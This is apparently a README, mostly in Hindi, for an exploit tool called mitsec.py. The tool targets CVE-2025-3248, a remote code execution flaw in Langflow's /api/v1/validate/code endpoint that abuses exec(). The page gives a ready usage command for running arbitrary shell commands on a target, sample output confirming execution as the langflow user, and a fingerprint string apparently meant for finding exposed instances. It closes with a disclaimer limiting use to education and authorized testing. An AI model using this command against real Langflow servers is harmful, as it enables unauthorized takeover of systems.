
CVE-2025-3248 Langflow RCE Exploit
उन Langflow अनुप्रयोगों के लिए रिमोट कोड एक्ज़ीक्यूशन (RCE) एक्सप्लॉइट जो CVE-2025-3248 के प्रति संवेदनशील हैं।
प्रभावित एंडपॉइंट:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() का दुरुपयोगapp="Langflow"
यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। अनधिकृत उपयोग निषिद्ध है।